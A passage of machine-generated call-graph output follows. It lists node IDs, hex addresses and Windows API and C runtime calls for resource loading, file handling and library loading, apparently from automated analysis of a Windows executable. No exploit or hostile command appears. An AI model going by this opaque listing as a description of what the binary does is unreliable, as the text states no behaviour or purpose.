94515->94516 94516->94458 94582 354214 94517->94582 94522 3541d4 LoadLibraryExW 94592 354291 94522->94592 94523 3c4f73 94525 354252 84 API calls 94523->94525 94527 3c4f7a 94525->94527 94529 354291 3 API calls 94527->94529 94531 3c4f82 94529->94531 94530 3541fb 94530->94531 94532 354207 94530->94532 94618 3544ed 94531->94618 94533 354252 84 API calls 94532->94533 94536 3539fe 94533->94536 94536->94471 94541 39c396 94536->94541 94538 3c4fa9 94626 354950 94538->94626 94540 3c4fb6 94542 354517 83 API calls 94541->94542 94543 39c405 94542->94543 94804 39c56d 94543->94804 94546 3544ed 64 API calls 94547 39c432 94546->94547 94548 3544ed 64 API calls 94547->94548 94549 39c442 94548->94549 94550 3544ed 64 API calls 94549->94550 94551 39c45d 94550->94551 94552 3544ed 64 API calls 94551->94552 94553 39c478 94552->94553 94554 354517 83 API calls 94553->94554 94555 39c48f 94554->94555 94556 37395c __crtGetStringTypeA_stat 47 API calls 94555->94556 94557 39c496 94556->94557 94558 37395c __crtGetStringTypeA_stat 47 API calls 94557->94558 94559 39c4a0 94558->94559 94560 3544ed 64 API calls 94559->94560 94561 39c4b4 94560->94561 94562 39bf5a GetSystemTimeAsFileTime 94561->94562 94563 39c4c7 94562->94563 94564 39c4dc 94563->94564 94565 39c4f1 94563->94565 94568 371c9d _free 47 API calls 94564->94568 94566 39c4f7 94565->94566 94567 39c556 94565->94567 94810 39b965 94566->94810 94570 371c9d _free 47 API calls 94567->94570 94571 39c4e2 94568->94571 94573 39c41b 94570->94573 94574 371c9d _free 47 API calls 94571->94574 94573->94474 94576 354252 94573->94576 94574->94573 94575 371c9d _free 47 API calls 94575->94573 94577 354263 94576->94577 94578 35425c 94576->94578 94580 354283 FreeLibrary 94577->94580 94581 354272 94577->94581 94579 3735e4 __fcloseall 83 API calls 94578->94579 94579->94577 94580->94581 94581->94474 94631 354339 94582->94631 94585 35423c 94587 354244 FreeLibrary 94585->94587 94588 3541bb 94585->94588 94587->94588 94589 373499 94588->94589 94639 3734ae 94589->94639 94591 
3541c8 94591->94522 94591->94523 94718 3542e4 94592->94718 94595 3542b8 94596 3542c1 FreeLibrary 94595->94596 94597 3541ec 94595->94597 94596->94597 94599 354380 94597->94599 94600 36f4ea 48 API calls 94599->94600 94601 354395 94600->94601 94602 3547b7 48 API calls 94601->94602 94603 3543a1 ___crtGetEnvironmentStringsW 94602->94603 94604 3543dc 94603->94604 94606 3544d1 94603->94606 94607 354499 94603->94607 94605 354950 57 API calls 94604->94605 94614 3543e5 94605->94614 94737 39c750 93 API calls 94606->94737 94726 35406b CreateStreamOnHGlobal 94607->94726 94610 3544ed 64 API calls 94610->94614 94612 354479 94612->94530 94613 3c4ed7 94615 354517 83 API calls 94613->94615 94614->94610 94614->94612 94614->94613 94732 354517 94614->94732 94616 3c4eeb 94615->94616 94617 3544ed 64 API calls 94616->94617 94617->94612 94619 3544ff 94618->94619 94622 3c4fc0 94618->94622 94761 37381e 94619->94761 94623 39bf5a 94781 39bdb4 94623->94781 94625 39bf70 94625->94538 94627 35495f 94626->94627 94628 3c5002 94626->94628 94786 373e65 94627->94786 94630 354967 94630->94540 94635 35434b 94631->94635 94634 354321 LoadLibraryA GetProcAddress 94634->94585 94636 35422f 94635->94636 94637 354354 LoadLibraryA 94635->94637 94636->94585 94636->94634 94637->94636 94638 354365 GetProcAddress 94637->94638 94638->94636 94642 3734ba _fseek 94639->94642 94640 3734cd 94687 377c0e 47 API calls __getptd_noexit 94640->94687 94642->94640 94643 3734fe 94642->94643 94658 37e4c8 94643->94658 94644 3734d2 94688 376e10 8 API calls _fseek 94644->94688 94647 373503 94648 37350c 94647->94648 94649 373519 94647->94649 94689 377c0e 47 API calls __getptd_noexit 94648->94689 94651 373543 94649->94651 94652 373523 94649->94652 94672 37e5e0 94651->94672 94690 377c0e 47 API calls __getptd_noexit 94652->94690 94653 3734dd _fseek @_EH4_CallFilterFunc@8 94653->94591 94659 37e4d4 _fseek 94658->94659 94660 377cf4 __lock 47 API calls 94659->94660 94667 37e4e2 94660->94667 94661 37e559 94697 3769d0 47 API calls 
__crtGetStringTypeA_stat 94661->94697 94664 37e560 94666 37e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94664->94666 94670 37e552 94664->94670 94665 37e5cc _fseek 94665->94647 94666->94670 94667->94661 94668 377d7c __mtinitlocknum 47 API calls 94667->94668 94667->94670 94695 374e5b 48 API calls __lock 94667->94695 94696 374ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94667->94696 94668->94667 94692 37e5d7 94670->94692 94673 37e600 __wopenfile 94672->94673 94674 37e61a 94673->94674 94686 37e7d5 94673->94686 94704 37185b 59 API calls 2 library calls 94673->94704 94702 377c0e 47 API calls __getptd_noexit 94674->94702 94676 37e61f 94703 376e10 8 API calls _fseek 94676->94703 94678 37354e 94691 373570 LeaveCriticalSection LeaveCriticalSection _fseek 94678->94691 94679 37e838 94699 3863c9 94679->94699 94682 37e7ce 94682->94686 94705 37185b 59 API calls 2 library calls 94682->94705 94684 37e7ed 94684->94686 94706 37185b 59 API calls 2 library calls 94684->94706 94686->94674 94686->94679 94687->94644 94688->94653 94689->94653 94690->94653 94691->94653 94698 377e58 LeaveCriticalSection 94692->94698 94694 37e5de 94694->94665 94695->94667 94696->94667 94697->94664 94698->94694 94707 385bb1 94699->94707 94701 3863e2 94701->94678 94702->94676 94703->94678 94704->94682 94705->94684 94706->94686 94708 385bbd _fseek 94707->94708 94709 385bcf 94708->94709 94712 385c06 94708->94712 94710 377c0e _fseek 47 API calls 94709->94710 94711 385bd4 94710->94711 94713 376e10 _fseek 8 API calls 94711->94713 94714 385c78 __wsopen_helper 110 API calls 94712->94714 94717 385bde _fseek 94713->94717 94715 385c23 94714->94715 94716 385c4c __wsopen_helper LeaveCriticalSection 94715->94716 94716->94717 94717->94701 94722 3542f6 94718->94722 94721 3542cc LoadLibraryA GetProcAddress 94721->94595 94723 3542aa 94722->94723 94724 3542ff LoadLibraryA 94722->94724 94723->94595 94723->94721 94724->94723 94725 354310 GetProcAddress 94724->94725 94725->94723 94727 354085 
FindResourceExW 94726->94727 94731 3540a2 94726->94731 94728 3c4f16 LoadResource 94727->94728 94727->94731 94729 3c4f2b SizeofResource 94728->94729 94728->94731 94730 3c4f3f LockResource 94729->94730 94729->94731 94730->94731 94731->94604 94733 354526 94732->94733 94736 3c4fe0 94732->94736 94738 373a8d 94733->94738 94735 354534 94735->94614 94737->94604 94740 373a99 _fseek 94738->94740 94739 373aa7 94751 377c0e 47 API calls __getptd_noexit 94739->94751 94740->94739 94742 373acd 94740->94742 94753 374e1c 94742->94753 94743 373aac 94752 376e10 8 API calls _fseek 94743->94752 94746 373ad3 94759 3739fe 81 API calls 3 library calls 94746->94759 94748 373ae2 94760 373b04 LeaveCriticalSection LeaveCriticalSection _fseek 94748->94760 94750 373ab7 _fseek 94750->94735 94751->94743 94752->94750 94754 374e4e EnterCriticalSection 94753->94754 94755 374e2c 94753->94755 94757 374e44 94754->94757 94755->94754 94756 374e34 94755->94756 94758 377cf4 __lock 47 API calls 94756->94758 94757->94746 94758->94757 94759->94748 94760->94750 94764 373839 94761->94764 94763 354510 94763->94623 94765 373845 _fseek 94764->94765 94766 37385b _memset 94765->94766 94767 373888 94765->94767 94768 373880 _fseek 94765->94768 94777 377c0e 47 API calls __getptd_noexit 94766->94777 94769 374e1c __lock_file 48 API calls 94767->94769 94768->94763 94770 37388e 94769->94770 94779 37365b 62 API calls 6 library calls 94770->94779 94773 373875 94778 376e10 8 API calls _fseek 94773->94778 94774 3738a4 94780 3738c2 LeaveCriticalSection LeaveCriticalSection _fseek 94774->94780 94777->94773 94778->94768 94779->94774 94780->94768 94784 37344a GetSystemTimeAsFileTime 94781->94784 94783 39bdc3 94783->94625 94785 373478 __aulldiv 94784->94785 94785->94783 94787 373e71 _fseek 94786->94787 94788 373e94 94787->94788 94789 373e7f 94787->94789 94791 374e1c __lock_file 48 API calls 94788->94791 94800 377c0e 47 API calls __getptd_noexit 94789->94800 94793 373e9a 94791->94793 94792 373e84 94801 376e10 8 API calls _fseek 
94792->94801 94802 373b0c 55 API calls 5 library calls 94793->94802 94796 373ea5 94803 373ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94796->94803 94798 373eb7 94799 373e8f _fseek 94798->94799 94799->94630 94800->94792 94801->94799 94802->94796 94803->94798 94809 39c581 __tzset_nolock _wcscmp 94804->94809 94805 3544ed 64 API calls 94805->94809 94806 39c417 94806->94546 94806->94573 94807 39bf5a GetSystemTimeAsFileTime 94807->94809 94808 354517 83 API calls 94808->94809 94809->94805 94809->94806 94809->94807 94809->94808 94811 39b97e 94810->94811 94812 39b970 94810->94812 94814 39b9c3 94811->94814 94815 373499 117 API calls 94811->94815 94825 39b987 94811->94825 94813 373499 117 API calls 94812->94813 94813->94811 94841 39bbe8 64 API calls 3 library calls 94814->94841 94817 39b9a8 94815->94817 94817->94814 94819 39b9b1 94817->94819 94818 39ba07 94820 39ba0b 94818->94820 94821 39ba2c 94818->94821 94819->94825 94852 3735e4 94819->94852 94824 39ba18 94820->94824 94827 3735e4 __fcloseall 83 API calls 94820->94827 94842 39b7e5 47 API calls __crtGetStringTypeA_stat 94821->94842 94824->94825 94829 3735e4 __fcloseall 83 API calls 94824->94829 94825->94575 94826 39ba34 94828 39ba5a 94826->94828 94830 39ba3a 94826->94830 94827->94824 94843 39ba8a 90 API calls 94828->94843 94829->94825 94832 3735e4 __fcloseall 83 API calls 94830->94832 94833 39ba47 94830->94833 94832->94833 94833->94825 94836 3735e4 __fcloseall 83 API calls 94833->94836 94834 39ba61 94844 39bb64 94834->94844 94836->94825 94838 39ba75 94838->94825 94840 3735e4 __fcloseall 83 API calls 94838->94840 94839 3735e4 __fcloseall 83 API calls 94839->94838 94840->94825 94841->94818 94842->94826 94843->94834 94845 39bb77 94844->94845 94846 39bb71 94844->94846 94848 371c9d _free 47 API calls 94845->94848 94849 39bb88 94845->94849 94847 371c9d _free 47 API calls 94846->94847 94847->94845 94848->94849 94850 371c9d _free 47 API calls 94849->94850 94851 39ba68 94849->94851 94850->94851 94851->94838 94851->94839 94853 
3735f0 _fseek 94852->94853 94854 373604 94853->94854 94855 37361c 94853->94855 94881 377c0e 47 API calls __getptd_noexit 94854->94881 94857 374e1c __lock_file 48 API calls 94855->94857 94861 373614 _fseek 94855->94861 94859 37362e 94857->94859 94858 373609 94882 376e10 8 API calls _fseek 94858->94882 94865 373578 94859->94865 94861->94825 94866 373587 94865->94866 94868 37359b 94865->94868 94924 377c0e 47 API calls __getptd_noexit 94866->94924 94869 373597 94868->94869 94884 372c84 94868->94884 94883 373653 LeaveCriticalSection LeaveCriticalSection _fseek 94869->94883 94870 37358c 94925 376e10 8 API calls _fseek 94870->94925 94877 3735b5 94901 37e9d2 94877->94901 94879 3735bb 94879->94869 94880 371c9d _free 47 API calls 94879->94880 94880->94869 94881->94858 94882->94861 94883->94861 94885 372c97 94884->94885 94886 372cbb 94884->94886 94885->94886 94887 372933 __flush 47 API calls 94885->94887 94890 37eb36 94886->94890 94888 372cb4 94887->94888 94926 37af61 94888->94926 94891 3735af 94890->94891 94892 37eb43 94890->94892 94894 372933 94891->94894 94892->94891 94893 371c9d _free 47 API calls 94892->94893 94893->94891 94895 372952 94894->94895 94896 37293d 94894->94896 94895->94877 94951 377c0e 47 API calls __getptd_noexit 94896->94951 94898 372942 94952 376e10 8 API calls _fseek 94898->94952 94900 37294d 94900->94877 94902 37e9de _fseek 94901->94902 94903 37e9e6 94902->94903 94904 37e9fe 94902->94904 94977 377bda 47 API calls __getptd_noexit 94903->94977 94905 37ea7b 94904->94905 94910 37ea28 94904->94910 94981 377bda 47 API calls __getptd_noexit 94905->94981 94908 37e9eb 94978 377c0e 47 API calls __getptd_noexit 94908->94978 94909 37ea80 94982 377c0e 47 API calls __getptd_noexit 94909->94982 94953 37a8ed 94910->94953 94912 37e9f3 _fseek 94912->94879 94915 37ea88 94983 376e10 8 API calls _fseek 94915->94983 94916 37ea2e 94918 37ea41 94916->94918 94919 37ea4c 94916->94919 94962 37ea9c 94918->94962 94979 377c0e 47 API calls __getptd_noexit 94919->94979 94922 37ea47 
94980 37ea73 LeaveCriticalSection __unlock_fhandle 94922->94980 94924->94870 94925->94869 94927 37af6d _fseek 94926->94927 94928 37af75 94927->94928 94929 37af8d 94927->94929 94930 377bda __dosmaperr 47 API calls 94928->94930 94931 37b022 94929->94931 94935 37afbf 94929->94935 94932 37af7a 94930->94932 94933 377bda __dosmaperr 47 API calls 94931->94933 94934 377c0e _fseek 47 API calls 94932->94934 94936 37b027 94933->94936 94948 37af82 _fseek 94934->94948 94937 37a8ed ___lock_fhandle 49 API calls 94935->94937 94938 377c0e _fseek 47 API calls 94936->94938 94939 37afc5 94937->94939 94940 37b02f 94938->94940 94941 37afeb 94939->94941 94942 37afd8 94939->94942 94943 376e10 _fseek 8 API calls 94940->94943 94945 377c0e _fseek 47 API calls 94941->94945 94944 37b043 __chsize_nolock 75 API calls 94942->94944 94943->94948 94947 37afe4 94944->94947 94946 37aff0 94945->94946 94949 377bda __dosmaperr 47 API calls 94946->94949 94950 37b01a __flush LeaveCriticalSection 94947->94950 94948->94886 94949->94947 94950->94948 94951->94898 94952->94900 94954 37a8f9 _fseek 94953->94954 94955 37a946 EnterCriticalSection 94954->94955 94956 377cf4 __lock 47 API calls 94954->94956 94957 37a96c _fseek 94955->94957 94958 37a91d 94956->94958 94957->94916 94959 37a93a 94958->94959 94960 37a928 InitializeCriticalSectionAndSpinCount 94958->94960 94961 37a970 ___lock_fhandle LeaveCriticalSection 94959->94961 94960->94959 94961->94955 94963 37aba4 __lseek_nolock 47 API calls 94962->94963 94966 37eaaa 94963->94966 94964 37eb00 94965 37ab1e __free_osfhnd 48 API calls 94964->94965 94969 37eb08 94965->94969 94966->94964 94967 37aba4 __lseek_nolock 47 API calls 94966->94967 94976 37eade 94966->94976 94970 37ead5 94967->94970 94968 37aba4 __lseek_nolock 47 API calls 94971 37eaea CloseHandle 94968->94971 94972 37eb2a 94969->94972 94975 377bed __dosmaperr 47 API calls 94969->94975 94973 37aba4 __lseek_nolock 47 API calls 94970->94973 94971->94964 94974 37eaf6 GetLastError 94971->94974 94972->94922 
94973->94976 94974->94964 94975->94972 94976->94964 94976->94968 94977->94908 94978->94912 94979->94922 94980->94912 94981->94909 94982->94915 94983->94912 94984->94486 94985->94496 94986->94496 94987->94490 94988->94509 94989->94511 94990->94508 94992 37f8a0 __ftell_nolock 94991->94992 94993 3540b4 GetLongPathNameW 94992->94993 94994 356a63 48 API calls 94993->94994 94995 3540dc 94994->94995 94996 3549a0 94995->94996 94997 35d7f7 48 API calls 94996->94997 94998 3549b2 94997->94998 94999 35660f 49 API calls 94998->94999 95000 3549bd 94999->95000 95001 3c2e35 95000->95001 95002 3549c8 95000->95002 95007 3c2e4f 95001->95007 95049 36d35e 60 API calls 95001->95049 95003 3564cf 48 API calls 95002->95003 95005 3549d4 95003->95005 95043 3528a6 95005->95043 95008 3549e7 Mailbox 95008->94360 95010 3541a9 136 API calls 95009->95010 95011 35415e 95010->95011 95012 3c3489 95011->95012 95014 3541a9 136 API calls 95011->95014 95013 39c396 122 API calls 95012->95013 95015 3c349e 95013->95015 95016 354172 95014->95016 95017 3c34bf 95015->95017 95018 3c34a2 95015->95018 95016->95012 95019 35417a 95016->95019 95021 36f4ea 48 API calls 95017->95021 95020 354252 84 API calls 95018->95020 95022 354186 95019->95022 95023 3c34aa 95019->95023 95020->95023 95042 3c3504 Mailbox 95021->95042 95050 35c833 95022->95050 95161 396b49 87 API calls _wprintf 95023->95161 95026 3c34b8 95026->95017 95028 3c36b4 95029 371c9d _free 47 API calls 95028->95029 95030 3c36bc 95029->95030 95031 354252 84 API calls 95030->95031 95036 3c36c5 95031->95036 95035 371c9d _free 47 API calls 95035->95036 95036->95035 95038 354252 84 API calls 95036->95038 95163 3925b5 86 API calls 4 library calls 95036->95163 95038->95036 95039 35ce19 48 API calls 95039->95042 95042->95028 95042->95036 95042->95039 95138 392551 95042->95138 95141 399c12 95042->95141 95147 35ba85 95042->95147 95155 354dd9 95042->95155 95162 392472 60 API calls 2 library calls 95042->95162 95044 3528b8 95043->95044 95048 3528d7 
___crtGetEnvironmentStringsW 95043->95048 95046 36f4ea 48 API calls 95044->95046 95045 36f4ea 48 API calls 95047 3528ee 95045->95047 95046->95048 95047->95008 95048->95045 95049->95001 95051 35c843 __ftell_nolock 95050->95051 95052 35c860 95051->95052 95053 3c3095 95051->95053 95169 3548ba 49 API calls 95052->95169 95188 3925b5 86 API calls 4 library calls 95053->95188 95056 35c882 95170 354550 56 API calls 95056->95170 95057 3c30a8 95189 3925b5 86 API calls 4 library calls 95057->95189 95059 35c897 95059->95057 95061 35c89f 95059->95061 95063 35d7f7 48 API calls 95061->95063 95062 3c30c4 95065 35c90c 95062->95065 95064 35c8ab 95063->95064 95171 36e968 49 API calls __ftell_nolock 95064->95171 95067 3c30d7 95065->95067 95068 35c91a 95065->95068 95071 354907 CloseHandle 95067->95071 95174 371dfc 95068->95174 95069 35c8b7 95072 35d7f7 48 API calls 95069->95072 95073 3c30e3 95071->95073 95074 35c8c3 95072->95074 95075 3541a9 136 API calls 95073->95075 95076 35660f 49 API calls 95074->95076 95077 3c310d 95075->95077 95078 35c8d1 95076->95078 95080 3c3136 95077->95080 95084 39c396 122 API calls 95077->95084 95172 36eb66 SetFilePointerEx ReadFile 95078->95172 95079 35c943 _wcscat _wcscpy 95083 35c96d SetCurrentDirectoryW 95079->95083 95190 3925b5 86 API calls 4 library calls 95080->95190 95088 36f4ea 48 API calls 95083->95088 95089 3c3129 95084->95089 95085 35c8fd 95173 3546ce SetFilePointerEx SetFilePointerEx 95085->95173 95087 3c314d 95122 35cad1 Mailbox 95087->95122 95090 35c988 95088->95090 95091 3c3131 95089->95091 95092 3c3152 95089->95092 95094 3547b7 48 API calls 95090->95094 95095 354252 84 API calls 95091->95095 95093 354252 84 API calls 95092->95093 95096 3c3157 95093->95096 95125 35c993 Mailbox __wsetenvp 95094->95125 95095->95080 95097 36f4ea 48 API calls 95096->95097 95104 3c3194 95097->95104 95098 35ca9d 95184 354907 95098->95184 95102 353d98 95102->94234 95102->94256 95103 35caa9 SetCurrentDirectoryW 95103->95122 95106 35ba85 48 API calls 95104->95106 
95135 3c31dd Mailbox 95106->95135 95108 3c33ce 95193 399b72 48 API calls 95108->95193 95109 3c3467 95197 3925b5 86 API calls 4 library calls 95109->95197 95113 3c3480 95113->95098 95114 3c33f0 95194 3b29e8 48 API calls ___crtGetEnvironmentStringsW 95114->95194 95116 3c33fd 95117 371c9d _free 47 API calls 95116->95117 95117->95122 95119 3c345f 95196 39240b 48 API calls 3 library calls 95119->95196 95120 35ce19 48 API calls 95120->95125 95164 3548dd 95122->95164 95123 35ba85 48 API calls 95123->95135 95125->95098 95125->95109 95125->95119 95125->95120 95177 35b337 56 API calls _wcscpy 95125->95177 95178 36c258 GetStringTypeW 95125->95178 95179 35cb93 59 API calls __wcsnicmp 95125->95179 95180 35cb5a GetStringTypeW __wsetenvp 95125->95180 95181 3716d0 GetStringTypeW __wtof_l 95125->95181 95182 35cc24 162 API calls 3 library calls 95125->95182 95183 36c682 48 API calls 95125->95183 95127 392551 48 API calls 95127->95135 95129 35ce19 48 API calls 95129->95135 95131 399c12 48 API calls 95131->95135 95132 3c3420 95195 3925b5 86 API calls 4 library calls 95132->95195 95134 3c3439 95136 371c9d _free 47 API calls 95134->95136 95135->95108 95135->95123 95135->95127 95135->95129 95135->95131 95135->95132 95191 392472 60 API calls 2 library calls 95135->95191 95192 36c682 48 API calls 95135->95192 95137 3c344c 95136->95137 95137->95122 95139 36f4ea 48 API calls 95138->95139 95140 392581 ___crtGetEnvironmentStringsW 95139->95140 95140->95042 95142 399c1d 95141->95142 95143 36f4ea 48 API calls 95142->95143 95144 399c34 95143->95144 95145 399c43 95144->95145 95146 35ce19 48 API calls 95144->95146 95145->95042 95146->95145 95148 35bb25 95147->95148 95152 35ba98 ___crtGetEnvironmentStringsW 95147->95152 95150 36f4ea 48 API calls 95148->95150 95149 36f4ea 48 API calls 95151 35ba9f 95149->95151 95150->95152 95153 35bac8 95151->95153 95154 36f4ea 48 API calls 95151->95154 95152->95149 95153->95042 95154->95153 95156 354dec 95155->95156 95158 354e9a 95155->95158 95157 36f4ea 48 API 
calls 95156->95157 95160 354e1e 95156->95160 95157->95160 95158->95042 95159 36f4ea 48 API calls 95159->95160 95160->95158 95160->95159 95161->95026 95162->95042 95163->95036 95165 354907 CloseHandle 95164->95165 95166 3548e5 Mailbox 95165->95166 95167 354907 CloseHandle 95166->95167 95168 3548fc 95167->95168 95168->95102 95169->95056 95170->95059 95171->95069 95172->95085 95173->95065 95198 371e46 95174->95198 95177->95125 95178->95125 95179->95125 95180->95125 95181->95125 95182->95125 95183->95125 95185 354911 95184->95185 95186 354920 95184->95186 95185->95103 95186->95185 95187 354925 CloseHandle 95186->95187 95187->95185 95188->95057 95189->95062 95190->95087 95191->95135 95192->95135 95193->95114 95194->95116 95195->95134 95196->95109 95197->95113 95200 371e61 95198->95200 95202 371e55 95198->95202 95222 377c0e 47 API calls __getptd_noexit 95200->95222 95201 372019 95204 371e41 95201->95204 95223 376e10 8 API calls _fseek 95201->95223 95202->95200 95210 371ed4 95202->95210 95217 379d6b 47 API calls _fseek 95202->95217 95204->95079 95206 371fa0 95206->95200 95206->95204 95209 371fb0 95206->95209 95207 371f5f 95207->95200 95208 371f7b 95207->95208 95219 379d6b 47 API calls _fseek 95207->95219 95208->95200 95208->95204 95213 371f91 95208->95213 95221 379d6b 47 API calls _fseek 95209->95221 95210->95200 95216 371f41 95210->95216 95218 379d6b 47 API calls _fseek 95210->95218 95220 379d6b 47 API calls _fseek 95213->95220 95216->95206 95216->95207 95217->95210 95218->95216 95219->95208 95220->95204 95221->95204 95222->95201 95223->95204 95225 354d94 95224->95225 95226 354c8b 95224->95226 95225->94366 95226->95225 95227 36f4ea 48 API calls 95226->95227 95228 354cb2 95227->95228 95229 36f4ea 48 API calls 95228->95229 95234 354d22 95229->95234 95232 354dd9 48 API calls 95232->95234 95233 35ba85 48 API calls 95233->95234 95234->95225 95234->95232 95234->95233 95237 35b470 95234->95237 95265 399af1 48 API calls 95234->95265 95235->94368 95236->94370 95238 356b0f 48 API 
calls 95237->95238 95256 35b495 95238->95256 95239 35b69b 95240 35ba85 48 API calls 95239->95240 95241 35b6b5 Mailbox 95240->95241 95241->95234 95244 3c397b 95271 3926bc 88 API calls 4 library calls 95244->95271 95245 35b9e4 95272 3926bc 88 API calls 4 library calls 95245->95272 95246 35ba85 48 API calls 95246->95256 95249 3c3973 95249->95241 95252 3c3989 95254 35ba85 48 API calls 95252->95254 95253 35bcce 48 API calls 95253->95256 95254->95249 95255 3c3909 95257 356b4a 48 API calls 95255->95257 95256->95239 95256->95244 95256->95245 95256->95246 95256->95253 95256->95255 95258 35bb85 48 API calls 95256->95258 95261 35bdfa 48 API calls 95256->95261 95264 3c3939 ___crtGetEnvironmentStringsW 95256->95264 95266 35c413 59 API calls 95256->95266 95267 35bc74 48 API calls 95256->95267 95268 35c6a5 49 API calls 95256->95268 95269 35c799 48 API calls ___crtGetEnvironmentStringsW 95256->95269 95259 3c3914 95257->95259 95258->95256 95263 36f4ea 48 API calls 95259->95263 95262 35b66c CharUpperBuffW 95261->95262 95262->95256 95263->95264 95270 3926bc 88 API calls 4 library calls 95264->95270 95265->95234 95266->95256 95267->95256 95268->95256 95269->95256 95270->95249 95271->95252 95272->95249 95274 3c418d EnumResourceNamesW 95273->95274 95275 35403c LoadImageW 95273->95275 95276 353ee1 RegisterClassExW 95274->95276 95275->95276 95277 353f53 7 API calls 95276->95277 95277->94385 95279 35f130 95278->95279 95281 35fe30 335 API calls 95279->95281 95284 35f199 95279->95284 95280 35f595 95289 35d7f7 48 API calls 95280->95289 95310 35f431 Mailbox 95280->95310 95282 3c8728 95281->95282 95282->95284 95377 39cc5c 86 API calls 4 library calls 95282->95377 95283 3c87c8 95380 39cc5c 86 API calls 4 library calls 95283->95380 95284->95280 95291 35d7f7 48 API calls 95284->95291 95308 35f229 95284->95308 95332 35f3dd 95284->95332 95285 35fe30 335 API calls 95285->95310 95286 35f418 95292 3c8b1b 95286->95292 95286->95310 95313 35f6aa 95286->95313 95290 3c87a3 95289->95290 95379 370f0a 52 API 
calls __cinit 95290->95379 95293 3c8772 95291->95293 95314 3c8b2c 95292->95314 95315 3c8bcf 95292->95315 95378 370f0a 52 API calls __cinit 95293->95378 95294 39cc5c 86 API calls 95294->95310 95296 35f3f2 95296->95286 95381 399af1 48 API calls 95296->95381 95297 35f770 95303 3c8a45 95297->95303 95304 35f77a 95297->95304 95299 35d6e9 55 API calls 95299->95310 95301 3c8c53 95395 39cc5c 86 API calls 4 library calls 95301->95395 95302 3c8810 95382 3aeef8 335 API calls 95302->95382 95387 36c1af 48 API calls 95303->95387 95320 361b90 48 API calls 95304->95320 95305 35fe30 335 API calls 95305->95313 95306 3c8b7e 95390 3ae40a 335 API calls Mailbox 95306->95390 95308->95280 95308->95286 95308->95310 95308->95332 95310->95285 95310->95294 95310->95299 95310->95301 95310->95306 95316 3c8beb 95310->95316 95321 35f537 Mailbox 95310->95321 95322 361b90 48 API calls 95310->95322 95324 35fce0 95310->95324 95376 35dd47 48 API calls ___crtGetEnvironmentStringsW 95310->95376 95388 3897ed InterlockedDecrement 95310->95388 95396 36c1af 48 API calls 95310->95396 95313->95297 95313->95305 95313->95310 95313->95321 95313->95324 95389 3af5ee 335 API calls 95314->95389 95392 39cc5c 86 API calls 4 library calls 95315->95392 95393 3abdbd 335 API calls Mailbox 95316->95393 95320->95310 95321->94411 95322->95310 95324->95321 95391 39cc5c 86 API calls 4 library calls 95324->95391 95325 3c8c00 95325->95321 95394 39cc5c 86 API calls 4 library calls 95325->95394 95329 3c884b 95383 3accdc 48 API calls 95329->95383 95330 3c8823 95330->95286 95330->95329 95332->95283 95332->95296 95332->95310 95333 3c8857 95335 3c8865 95333->95335 95336 3c88aa 95333->95336 95384 399b72 48 API calls 95335->95384 95339 3c88a0 Mailbox 95336->95339 95385 39a69d 48 API calls 95336->95385 95337 35fe30 335 API calls 95337->95321 95339->95337 95341 3c88e7 95386 35bc74 48 API calls 95341->95386 95344 364637 95343->95344 95345 36479f 95343->95345 95346 364643 95344->95346 95347 3c6e05 95344->95347 95348 35ce19 48 API calls 
95345->95348 95450 364300 335 API calls ___crtGetEnvironmentStringsW 95346->95450 95451 3ae822 335 API calls Mailbox 95347->95451 95355 3646e4 Mailbox 95348->95355 95351 3c6e11 95352 364739 Mailbox 95351->95352 95452 39cc5c 86 API calls 4 library calls 95351->95452 95352->94411 95354 364659 95354->95351 95354->95352 95354->95355 95357 354252 84 API calls 95355->95357 95397 3a6ff0 95355->95397 95406 396524 95355->95406 95409 39fa0c 95355->95409 95357->95352 95360->94411 95361->94411 95362->94411 95363->94411 95364->94411 95365->94391 95366->94395 95367->94400 95368->94411 95369->94411 95370->94418 95371->94418 95372->94418 95373->94418 95374->94418 95375->94418 95376->95310 95377->95284 95378->95308 95379->95310 95380->95321 95381->95302 95382->95330 95383->95333 95384->95339 95385->95341 95386->95339 95387->95310 95388->95310 95389->95310 95390->95324 95391->95321 95392->95321 95393->95325 95394->95321 95395->95321 95396->95310 95398 35936c 81 API calls 95397->95398 95399 3a702a 95398->95399 95400 35b470 91 API calls 95399->95400 95401 3a703a 95400->95401 95402 3a705f 95401->95402 95403 35fe30 335 API calls 95401->95403 95405 3a7063 95402->95405 95453 35cdb9 48 API calls 95402->95453 95403->95402 95405->95352 95454 396ca9 GetFileAttributesW 95406->95454 95410 39fa1c __ftell_nolock 95409->95410 95411 39fa44 95410->95411 95519 35d286 48 API calls 95410->95519 95413 35936c 81 API calls 95411->95413 95414 39fa5e 95413->95414 95415 39fb68 95414->95415 95416 39fa80 95414->95416 95425 39fb92 95414->95425 95417 3541a9 136 API calls 95415->95417 95418 35936c 81 API calls 95416->95418 95419 39fb79 95417->95419 95424 39fa8c _wcscpy _wcschr 95418->95424 95420 39fb8e 95419->95420 95422 3541a9 136 API calls 95419->95422 95421 35936c 81 API calls 95420->95421 95420->95425 95423 39fbc7 95421->95423 95422->95420 95426 371dfc __wsplitpath 47 API calls 95423->95426 95429 39fab0 _wcscat _wcscpy 95424->95429 95432 39fade _wcscat 95424->95432 95425->95352 95436 39fbeb _wcscat _wcscpy 
95426->95436 95427 35936c 81 API calls 95428 39fafc _wcscpy 95427->95428 95520 3972cb GetFileAttributesW 95428->95520 95430 35936c 81 API calls 95429->95430 95430->95432 95432->95427 95433 35936c 81 API calls 95435 39fb48 95433->95435 95434 39fb1c __wsetenvp 95434->95425 95434->95433 95521 3960dd 77 API calls 4 library calls 95435->95521 95438 35936c 81 API calls 95436->95438 95440 39fc82 95438->95440 95439 39fb5c 95439->95425 95458 39690b 95440->95458 95442 39fca2 95443 396524 3 API calls 95442->95443 95444 39fcb1 95443->95444 95445 35936c 81 API calls 95444->95445 95448 39fce2 95444->95448 95446 39fccb 95445->95446 95464 39bfa4 95446->95464 95449 354252 84 API calls 95448->95449 95449->95425 95450->95354 95451->95351 95452->95352 95453->95405 95455 396529 95454->95455 95456 396cc4 FindFirstFileW 95454->95456 95455->95352 95456->95455 95457 396cd9 FindClose 95456->95457 95457->95455 95459 396918 _wcschr __ftell_nolock 95458->95459 95460 371dfc __wsplitpath 47 API calls 95459->95460 95463 39692e _wcscat _wcscpy 95459->95463 95461 39695d 95460->95461 95462 371dfc __wsplitpath 47 API calls 95461->95462 95462->95463 95463->95442 95465 39bfb1 __ftell_nolock 95464->95465 95466 